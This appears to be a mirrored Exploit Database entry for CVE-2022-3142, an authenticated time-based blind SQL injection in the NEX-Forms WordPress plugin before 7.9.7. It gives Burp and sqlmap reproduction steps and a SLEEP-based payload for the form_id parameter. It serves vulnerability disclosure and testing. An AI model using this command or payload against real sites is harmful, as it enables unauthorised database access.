NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

• Exploit Database
• 15 阅读

• 作者： Elias Hohl
  日期： 2023-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51042/

• # Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
  # Exploit Author: Elias Hohl
  # Date: 2022-08-01
  # Vendor Homepage: https://basixonline.net
  # Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
  # Tested on: Ubuntu 20.04
  # CVE : CVE-2022-3142
  
  Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin
  
  https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
  
  1. Start a new WordPress instance using docker-compose.
  
  2. Install the NEX Forms plugin.
  
  3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
  
  4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
  sqlmap will find a time-based blind payload:
  
  
  Parameter: form_id (GET)
  Type: time-based blind
  Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
  Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)